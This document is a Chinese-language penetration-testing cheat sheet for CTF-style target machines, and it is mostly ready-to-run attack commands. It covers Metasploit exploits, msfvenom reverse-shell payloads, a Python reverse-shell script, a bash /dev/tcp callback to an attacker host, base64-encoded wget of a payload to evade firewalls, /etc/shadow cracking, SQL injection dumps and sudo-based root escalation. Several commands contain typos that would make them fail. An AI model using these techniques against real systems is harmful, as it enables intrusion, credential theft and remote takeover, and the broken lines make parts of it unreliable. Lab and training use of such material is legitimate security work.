FTP
信息探测
nmap -sV 192.168.0.1 //扫描服务信息以及服务版本
nmap -T4 -A -v 192.168.0.1 //快速扫描主机全部信息
saechsploit ProFTPD 1.3.3c(FTP版本信息) // 查看是否有漏洞溢出
使用Metasploit进行溢出
msfconsole //打开Metasploit
search ProFTPD 1.3.3.3c //输入search对应的软件及版本
use exploit/unix/ftp/proftpd_133c_backdoor //使用exploit
show payload //查看可以使用的payload
set payload cmd/unix/reverse //设置payload
设置payload参数
show options
set rhost 192.168.0.1 //靶场IP
set lhost 192.168.0.3 //攻击机IP
run //执行
执行命令
id //查看当前用户权限
python -c “import pty;pty.spawn(‘bin/bash’)” //使用python pty开启终端
获取flag值
pwd //查看当前路径
ls -alh //输出全部文件
cd /root/
ls -alh //输出全部文件
cat flag
注意:对于开放FTP、SSH、Telnet等服务的系统,可以尝试一些对应服务版本的漏洞代码;
对于系统,一定要注意利用现成的EXP来root主机。
寻找Flag
信息收集:
nmap -p- -T4 192.168.0.1 //是用最快速度探测所开端口
nmap -T4 -A -v 192.168.0.1 //扫描所有服务和信息
深入挖掘:
对于开放http服务的靶场可以使用其他命令进行探测
nikto -host http://192.168.0.1:8080 //敏感文件探测
dirb http://192.168.0.1:8080 //扫描敏感目录
分析nmap nikto扫描结果
nc 192.168.0.1 8888
//对于大端口非http服务可以使用nc来探测该端口的banner信息
//对于大端口http服务,可以使用浏览器浏览查看源代码寻找flag值
nc反弹命令之后
id //查看当前用户权限
pwd //查看当前所在的文件路径
ls -alh //详细输出全部文件
更深入挖掘:
FTP匿名登录 挖掘铭感信息;
在浏览器输入 ftp://192.168.0.1 匿名登录ftp服务器根目录,查看敏感文件,注意一定要查看源代码;
在站点robots.txt文件中 寻找敏感文件,挖掘敏感文件漏洞;
对于命令执行中,为了绕过对于的限制,可以使用相近命令来替代限制的shell命令
如 cat /etc/passwd 使用 more /etc/passwd 来代替
SSH远程登录
ssh Summer@192.168.0.1
22端口不能远程登录 使用其他端口登录ssh
ssh -p 22222 Summer@192.168.0.1 //用22222端口登陆ssh
pwd
ls
cat more //执行命令查看flag值
总结:
注意未知服务端口,使用nc获取对应的banner信息
使用对应相近的shell命令来绕过限制如 cat more
对每个服务都要进行对应的探测,不放过任何一个可以利用的点
SQL注入
GET
信息探测
nmap -sV 192.168.0.1 //扫描端口和端口的服务
nmap -T4 -A -v 192.168.0.1 //快速扫描主机全部信息
nikto -host http://192.168.0.1 //扫描目录
dirb http://192.168.0.1 //扫描敏感目录
漏洞扫描OWASP-zap(Kali自带)
漏洞利用Sqlmap
sqlmap -u “url” —dbs //查看数据库名
sqlmap -u “url” -D “数据库名” —tables //查看对应数据库中的数据表
sqlmap -u “url” -D “数据库名” -T “表名” —columns //查看对应字段
sqlmap -u “url” -D “数据库名” -T “表名” -C “列名1,列名2” —dump //查看对应字段的值
sqlmap -u “url” —os-shell //直接获取shell
Msf制作WebShell
攻击机监听
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.0.1
show options //查看参数是否设置完成
run
生成反弹
shell
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.0.1 lport=4444 -f raw > /root/Desktop/shell.php
生成文件
gedit shell.php
POST
信息探测 Wordpress靶场
nmap -T4 -p- 192.168.0.1 //扫描主机开放端口
nmap -T4 -A -v 192.168.0.1 //扫描主机全部信息
nikto -host http://192.168.0.1:8080 //对于某些靶场可以使用nikto扫描器
dirb http://192.168.0.1 //扫描靶场开放目录和文件
漏洞扫描工具OWASP-ZAP
POST提交SQLmap注入:
1、先抓到POST提交包
2、gedit request.raw //创建request文件
3、粘贴POST提交包
sqlmap -r request.raw —level 5 —risk 3 —dbs —dbms mysql —batch //数据库名
sqlmap -r request.raw —level 5 —risk 3 -D “数据库名” —tables —dbms mysql —batch //数据库中的表
sqlmap -r request.raw —level 5 —risk 3 -D “数据库名” -T “表名” —columns —dbms mysql —batch //表中的字段
sqlmap -r request.raw —level 5 —risk 3 -D “数据库名” -T “表名” -C “字段1,字段2” —dump —dbms mysql —batch //字段中的值
Wordpress后台寻找上传点:
主题的 404.php 上传shell
WebShell 获取 /usr/share/webshells/php/
cd /usr/share/webshells/
ls
cd php/
ls
cp php-reverse-shell.php /root/Desktop/ //拷贝反弹shell
cd /root/Desktop/
gedit php-reverse-shell.php //修改反弹ip和端口并拷贝
修改Wordpress 404.php页面为反弹shell
nc -nlvp 4444 //nc监听4444端口
执行shell,获取反弹shell
http://ip:port/目录/wp-content/themes/主题名/404.php //Wordpress404路径
python -c “import pty;pty.spawn(‘/bin/bash’)” //启动终端
cat /etc/shadow
cat /etc/passwd
su - //提升root权限 需要当前用户密码,使用sqlmap跑出来的密码
盲注
信息探测
nmap -sV 192.168.0.1 //扫描主机服务和版本
nmsp -T4 -A -v 192.168.0.1 //快速扫描主机全部信息
nikto -host http://192.168.0.1 //探测敏感信息
AVWS漏洞扫描器
//扫描到SQL时间盲注
SQLmap盲注:(—batch自动Y)
sqlmap -u “url” —headers=”X-Forwarded-For:*” —dbs —batch //查看数据库名
sqlmap -u “url” —headers=”X-Forwarded-For:*” -D “数据库名” —tables —batch //查看数据库中的表
sqlmap -u “url” —headers=”X-Forwarded-For:*” -D “数据库名” -T “表名” —columns —batch //查看表中的字段
sqlmap -u “url” —headers=”X-Forwarded-For:*” -D “数据库名” -T “表名” -C “字段1,字段2” —dump —batch
—headers 参数由AVWS扫出来的注入点
有
—user-agent
—rederer
—cookie //cookie用于重定向
SSH私钥泄露
dirb http://192.168.1.1:8888 //kail文件扫描
nmap -sV 192.168.0.1 //探测靶场开放的服务与服务的版本
nmap -A -v 192.168.0.1 //探测靶场全部信息
nmap -O 192.168.0.1 //探测靶场的操作系统类型与版本
nikto -host 192.168.0.1 //对于某些靶场 可以使用nikto扫描器
cat /etc/passwd //查看所有用户列表
cat /etc/group //查看用户组
find / -user root //查看属于某些用户的文件
tmp //查看缓冲文件目录
tmp$ ls -al //查看隐藏文件
cat /etc/crontab //查看其他用户是否有定时任务,并查看对应的任务内容
文件扫描到SSH秘钥 解密
ssh2john id_rsa > rsacrack //转换可识别的john
zcat /usr/share/wordlists/rockyou.txt.gz | john —pipe —rules rsacrack //字典解密
Python反弹shell代码:
!/usr/bin/python
import socket,os,subprocess
s=socker.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((“攻击机IP地址”,”攻击机监听端口”))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call([“/bin/sh”,”-i”])
nc -lpv 监听端口 //攻击机
id //查看当前用户权限(0号权限表示root权限)
su - root //提升权限(输入当前用户密码提升至root用户)
SSH暴力破解工具:hyara、medusa、metasploit(msf)
使用cupp创建字典:
git clone https://github.com/jeanphorn/common-password.git
ls common-password
chmod +x cupp.py
./cupp.py -i
//以交互的方式创建字典
或者使用:https://github.com/TheKingOfDuck/fuzzDicts 的字典
sessions -i l //爆破成功之后创建会话
python -c “import pty;pty.spawn(‘/bin/bash’)” //优化会话ssh
su - root //提升权限(输入当前用户密码提升至root用户)
总结:特别注意/tmp数据缓冲目录 以及/etc/crontab定时执行的文件(通过修改执行文件进行反弹shell)
SMB
SMB信息泄露(139 445端口)
nmap -A -v -T4 192.168.0.1 //查看靶场全部信息
针对SMB协议,使用空口令,弱口令尝试登陆并且查看敏感文件,下载查看:
smbclient -L 192.168.0.1
smbclient ‘\192.168.0.1\share$(文件名)
get flag.txt(文件名字) //下载敏感文件
searchsploit Samba smbd 4.3.11-Ubuntu(版本号) //针对SMB协议远程溢出漏洞进行分析
mysql -h 192.168.0.1 -u Admin -p //kali终端远程登录数据库
ssh Admin@192.168.0.1 //kali终端远程登录ssh
dirb http://192.168.0.1 //扫描靶场开放目录和文件
Msf制作WebShell
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.0.1 lport=4444 -f raw > /root/Desktop/shell.php
攻击机监听
msfconsole
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.0.1
set lport 4444
show options //查看参数是否设置完成
run
python -c “import pty;pty.spawn(‘/bin/bash’)” //优化会话ssh
cat /etc/passwd //查看其他用户名
su 用户名 //切换到该用户
sudo -l //查看当前用户能执行哪些root操作
su sudo //提升到root权限 需要当前用户密码
SSL注入
SSI主要是为了赋予html静态页面动态的效果,通过SSI来执行系统命令,并返回对应的结果
如果在网站目录中发现了.stm .shtm .shtml ,并且网站对于SSL的输入没有做到严格过滤,很有可能被SSI注入攻击
信息收集:
nmap -sV 192.168.0.1 //探测主机服务信息以及服务版本
nmap -T4 -A -v 192.168.0.1 //快速探测主机全部信息
nikto -host http://192.168.0.1 //探测敏感信息
dirb http://192.168.0.1 //遍历目录
深入挖掘:
分析nmap nikto扫描结果;使用浏览器打开敏感页面查看敏感信息,一定要查看源代码
漏洞利用:(根据提示来利用对应SSL注入漏洞)
//下载shell,给予权限,并执行
Msf制作WebShell(Python)
msfvenom -p python/meterpreter/reverse_tcp lhost=192.168.0.1 lport=4444 -f raw > /root/Desktop/shell.py
攻击机监听
msfconsole
use exploit/multi/handler
set payload python/meterpreter/reverse_tcp
set lhost 192.168.0.1
set lport 4444
show options //查看参数是否设置完成
run
mv shell.py /var/www/html/ //把shell.py移动到文件夹下
service apache2 start //打开Apache
service apache2 status //查看Apache是否打开
sysinfo //查看系统信息
shell //获取shell
shell
id //查看当前用户权限
python -c “import pty;pty.spawn(‘/bin/bash’)” //优化会话ssh
获取flag值(一般情况下,靶场机器的flag值是存放在服务器的根目录下,/root/目录)
cd /root/
ls
cat
flag
writeup 测试文档 总结文档
目录遍历
信息探测
nmap -sV 192.168.0.1 //扫描主机服务信息以及服务版本
nmap -T4 -A -v 192.168.0.1 //快速扫描主机全部信息
nikto -host http://192.168.0.1 //探测敏感信息
dirb http://192.168.0.1 //目录遍历
漏洞扫描:owasp-zap Web漏洞扫描器,自动挖掘web应用程序中的漏洞
owasp-zap //终端启动
分析扫描结果:
目录遍历漏洞
../../../../../../../../../etc/shadow
../../../../../../../../../etc/passwd
利用目录遍历漏洞获取shell思路:
— 上传webshell到服务器,之后通过对应的目录遍历路径访问webshell,执行webshell。在kali获取反弹shell
1、敏感页面上传shell
— dbadmin敏感目录有敏感页面,浏览器访问,使用弱口令登录;
登录页面之后 查找可以利用写webshell的点
使用/usr/share/webshell/php/下的shell(nc反弹)
cd /usr/share/webshell/php/
ls
cp php-reverse-shell.php /root/Desktop //拷贝到桌面
gedit php-reverse-shell.php //修改反弹IP地址和端口
mv php-reverse-shell.php shell.php //修改文件名字
2、在数据库中写入shell
新建库,新建表,字段
字段写入
3、创建web服务 用于靶场wget对应的shell
python -m “SimpleHTTPSever” //路径在哪里就是在哪里启动了一个HTTP服务
4、下载shell之前设置shell的监听 (nc)
nc -nlvp 端口号 //启动监听nc
5、目录遍历访问shell执行下载
../../../../../../../../../usr/databases/shell.php
6、监听端收到反弹shell
id //查看用户
python -c “import pty;pty.spawn(‘/bin/bash’)” //优化会话ssh
总结:利用目录遍历漏洞配合文件上传webshell,反弹对应shell。
也可以来获取敏感信息 例如破解Linux用户名和密码
/etc/passwd /etc/shadow
将passwd和shadow重新定义为可识别的文件
unshadow passwd shadow > cracked
使用john破解对应的cracked文件 登录ssh
john cracked
目录遍历之提权
提权前提:
1、已经拿到低权限shell
2、被入侵机器有nc、python、perl等常见工具
一、内核漏洞提权:(优先)
(1)
cat /etc/lssue //查看发行版本 不返回则无内容
cat /etc/*-release //查看发行版本 DISTRIB_DESCRIPTION=发行版本号
uname -a //查看内核版本
(2)
searchspoit 发行版本 内核版本 //寻找内核溢出代码
searchspoit Ubuntu 12.04.5 //没有则不能内核溢出
(3)如果有内核溢出漏洞则 :上传内核溢出代码
编译执行
gcc xxx.c -o exploit //编译内核溢出代码为可执行文件
chmod +x exploit //给予可执行文件权限
./exploit //执行
二、明文root密码提权
注:大多Linux系统密码都和/etc/passwd和/etc/shadow俩个配置文件息息相关,passwd里面储存了用户,shadow里面是密码的hash 出于安全考虑passwd是全用户可读,root可写。shadow仅root可读写
(1)破解Linux用户和对应密码
cat /etc/passwd/
cat /etc/shadow/
unshadow passwd shadow > cracked //转换为可识别的密码文件
john cracked
三、计划任务
默认这些程序以root权限执行,如果有幸遇到把其中脚本配置成任意用户可写的管理员,可以修改脚本等回连rootshell;如果定时执行的是py脚本,可以把脚本替换为py的反弹shell
cat /etc/crontab //查看是否有可写的计划任务
(1)Python反弹shell代码:
!/usr/bin/python
import socket,os,subprocess
s=socker.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((“攻击机IP地址”,”攻击机监听端口”))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call([“/bin/sh”,”-i”])
nc -lpv 监听端口 //攻击机使用nc接收
四、密码复用
寻找配置文件,挖掘对应密码,有了疑似的root密码一定是ssh登录,然而ssh很可能禁用root登录,或者防火墙限制,回过头来,我们有一个低权shell,想办法在上面输入root密码就好了,但是在低权shell直接用sudo是没用的,因为出于安全考虑,必须用终端设备中输入密码,我们必须模拟一个终端设备,python就有这样的功能
(1)在shell中输入
python -c “import pty;pty.spawn(‘/bin/sh’)” //模拟真正键盘输入
python -c “import pty;pty.spawn(‘/bin/bash’)” //同上
sudo -l
password //需要输入当前用户密码,尝试弱口令
ls -alh //查看敏感文件
cd /home
ls //查看该机器有哪些目录
cd zico
ls -alh //查看zice目录敏感文件
cd wordpress
cat wp-config.php //查看配置文件是否有对应密码,拿去密码复用
(2)配置文件中寻找到数据库zico用户和密码,尝试ssh连接
nmap -sV 192.168.0.1 //查看是否开放ssh服务
ssh zico@192.168.0.1 //用户名@主机名
password //输入zico用户密码
(3)成功登录
sudo -l //查看当前用户可以使用root提权的命令信息
//提示可以使用/bin/tar和/usr/bin/zip ,并且不需要root密码
四、ZIP提权
touch exploit //新建文件
sudo -u root zip exploit.zip exploit -T —unzip-command=”sh -c /bin/bash”
执行该命令则提升至root权限
五、tar提权
sudo -u root tar cf /dev/null exploit —checkpoint=1 —checkpoint-action=”/bin/bash”
命令执行
漏洞介绍:
当应用需要调用一些外部程序处理内容的情况下,就会用到执行系统命令的函数。
如PHP中的system、exec、shell_exec等
信息探测:
使用sparta工具对信息进行探测
sparta //终端输入打开
破解哈希值
(1)创建一个txt将哈希值输入进去
(2)打开 https://crackstation.net 将哈希值粘贴进去
通过破解的密码和对应的邮箱用户名登录后台
漏洞利用:AVWS
并未扫出漏洞就没有漏洞了吗
登录成功后
再点击webshell按钮
利用登录之后的cookie成功进入Webshell
反弹shell:
nc nlvp 4444 //攻击机启动监听netcat
echo ‘bash -i >& /dev/tcp/攻击机ip/4444 0>&1’ | bash //靶场机器反弹shell
python -c “import pty;pty.spawn(‘/bin/bash’)” //优化会话ssh
cd .. //返回上一层目录
cd .. //返回上一层目录
cd bulldogadmin //在home文件夹发现其他用户目录
ls //并没看到文件
ls -alh //使用这个命令可以查看隐藏的文件
cd .hiddenadmindirectory //切换到隐藏文件
string customPermissionApp //查看文件中的字符串内容
sudo su //查看到敏感字符疑似密码
使用sudo su输入密码
输入密码 //提升到root权限
中间件PUT上传漏洞
漏洞讲解:
中间件包括apache、tamcat、IIS、weblogic等,这些中间件可以设置支持的HTTP方法。(HTTP方法包括GET\POST、HEAD、DELETE、PUT、OPTION等)
PUT可以直接从客户机上传文件到服务器到指定的目录
信息探测:
nmap -p- -T4 192.168.0.1 //快速扫描主机开放的全部端口
nmap -T4 -A -v 192.168.0.1 //快速扫描主机全部信息
nikto -host http://192.168.0.1 //探测敏感信息
dirb http://192.168.0.1 //探测敏感信息
深入挖掘:
分析nmap、nikto扫描结果,挖掘可利用信息
使用漏洞扫描器owasp-zap
owasp-zap //终端打开 选择第三个
在扫描器中并没有扫描到任何漏洞
测试PUT漏洞
curl -v -X OPTIONS http://192.168.0.1/目录 //对敏感目录进行测试
Allow 为请求方法,里面有PUT请求方法
利用PUT漏洞获取shell思路:
上传webshell到服务器,之后通过对应的目录遍历路径访问Webshell获取反弹shell
上传webshell(浏览器插件Poster)
—在test目录下直接使用浏览器插件Poster,上传webshell
使用/usr/share/webshell/php/下的webshell
cp /usr/share/webshell/php/ // Tab俩下查看可以使用的shell
cp /usr/share/webshell/php/php-reverse-shell.php shell.php //将shell拷贝至桌面
gedit shell.php //编辑shell反弹的ip和端口
接受反弹shell
nc -nlvp 443 //绕过防火墙使用443端口
echo “import pty;pty.spawn(‘bin/bash’)” > /tmp/asdf.py //创建一个py
python /tmp/asdf.py //python执行该py文件
也可以
python -c “import pty;pty.spawn(‘/bin/bash’)” //优化会话ssh
id //查看当前用户权限
命令注入
信息收集:
nmap -sV 192.168.0.1 //扫描服务和服务版本
nmap -T4 -A -v 192.168.0.1 //快速扫描全部信息(-T4最快速度扫描)
nikto -host http://92.168.0.1 //探测敏感目录
dirb http://192.168.0.1 //探测敏感目录
查看robots.txt文件里的敏感目录
寻找到mp3文件
file backup.mp3 //查看文件具体文件类型
cat backup.mp3 //对于文本类型可以直接cat查看
查看到一个url尝试使用收集到的用户名和密码进行登录,成功登录到系统后台
可利用的信息
— robots.txt
— nothing
— secure
— backuo.zip
对于每一个可以看到的信息都要查看,比如某个文件、某个目录;
脑洞一定要大
进入系统渗透思路:
(1)登录-利用exploit-db
利用挖掘到的用户名和密码登录系统,然后对系统是否使用某种CMS、SMS等进行查看。
利用现成的EXP进行渗透
渗透测试技巧
searchsploit playSMS //查找是否有exp漏洞
searchsploit PlaySMS 1.4
cat usr/share/exploitdb/platforms/php/webapps/42003.txt //查看exp
查看POC,发现需要修改文件名
https://www.exploit-db.com/exploits/42003/
touch 1.csv //新建文件
BurpSuite抓包修改文件名为PHP语句
准备Shell
msfvenom -p linux/x86/meterpreter_reverse_tcp lhost=192.168.0.1 lport=4444 -f elf > /var/www/html/shell
攻击机监听
msfconsole
use exploit/multi/handler
set payload linux/x86/meterpreter_reverse_tcp
set lhost 192.168.0.1
set lport 4444
show options //查看参数是否设置完成
exploit
service apache2 start //启动apache
绕过防火墙上传shell
利用base64绕过防火墙检测
echo ‘wget http://192.168.0.1/shell -O /tmp/shell’ | base64 //tmp目录任何用户都有权限并且把这条命令base64加密
echo ‘chmod 777 /tmp/shell’ | base64 //命令base64加密
echo ‘/tmp/shell’ | base64 //命令base64加密
BurpSuite修改文件名:
base64_decode(‘为base64加密的密文’) //base64_decode()函数解密
完成反弹shell,提升权限、获取flag
shell
sudo -l //查看www-data用户的sudo权限
sudo perl -e “exec ‘/bin/sh’ “
bash -i
flag常在根目录下
cd /root/
cat flag.txt
总结:信息收集一定要充分,根据题目提示来逐步进行渗透测试
对于web系统,一定要注意利用现成的exp进行渗透
安全暴力破解
信息探测
nmap -sV 192.168.0.1 //探测主机服务和服务版本
nmap -T4 -A -v 192.168.0.1 //快速扫描主机全部信息
nikto -host http://192.168.0.1 //探测敏感信息
拟定wordpress博客登录用户名
wpscan —url www.vtcsec.com/secret/ —enumerate u
Y //更新
暴力破解:
msfconsole //启动MSF
use auxiliary/scanner/http/wordpress_login_enum
set username admin
set pass_file /usr/share/wordlists/dirb/common.txt
set targeturi /secret/ //目标的目录
set rhosts 192.168.1.13
run
上传Webshell获取控制权
— twentyteeth 的 404.php可以上传webshell
Msf制作WebShell
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.0.1 lport=4444 -f raw > /root/Desktop/shell.php
攻击机监听
msfconsole
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.0.1
set lport 4444
show options //查看参数是否设置完成
run
访问shell,获取反弹shell
http://ip/secret/wp-content/themes/主题名/404.php
sysinfo //查看系统信息
id //查看用户权限
利用返回shell提升root权限
下载
download /etc/passwd
download /etc/shadow
将文件转换为可以识别的文件格式
unshadow passwd shadow > cracked
使用john破解密码
john cracked
在反弹shell中输入
shell
python -c “import pty;pty.spawn(‘/bin/bash’)” //优化终端
su - 破解用户名 //切换用户
破解密码 //输入密码登录
sudo -l //切换到root用户
破解密码 //输入密码切换
sudo bash //启动权限
成功获取root权限
cd /root/ //查找flag
ls
cat
flag.txt
综合检测
信息探测:
nmap -sV 192.168.0.1 //扫描开放服务和服务版本
nmap -T4 -A -v 192.168.0.1 //快速扫描主机全部信息
nikto -host http://92.168.0.1 //探测敏感目录
dirb http://192.168.0.1 //探测敏感目录
config //存在数据库的用户和密码
icons //中间件目录
利用弱点:
— 登录界面是否存在SQL注入
— 敏感信息是否泄露
— 已知漏洞
— backup.zip文件等等
查看登录页面源代码
利用burp进行fuzz测试,绕过登录
web模糊测试字典位置
cd /usr/share/wordlists/wfuzz
ls
cd Injections //使用SQL.txt
cp SQL.txt /root/Desktop/SQL.txt //复制到桌面
总结
查看burp中的Introder模块中返回值的不同,区分不同响应
查看源代码中的js
上传webshell获取控制权
利用burpsuite绕过上传过滤机制
Msf制作WebShell
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.0.1 lport=4444 -f raw > /root/Desktop/shell.php
攻击机监听
msfconsole
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.0.1
set lport 4444
show options //查看参数是否设置完成
run
shell
id
sudo -l //并没有sudo权限
ls
cd ..
cat config.php //寻找到数据库用户米和密码
mysql -u root -p //终端连接mysql数据库
python -c “import pty;pty.spawn(‘/bin/bash’)” //优化会话ssh
show databases //查看数据库
use deneme //选择数据库
show tables //表的列
select * from user //查询字段
su - root //输入数据库查询到的密码登录root用户
总结:熟练掌控各种安全工具的使用,以及常见的漏洞利用方式,逐步深入的探测目标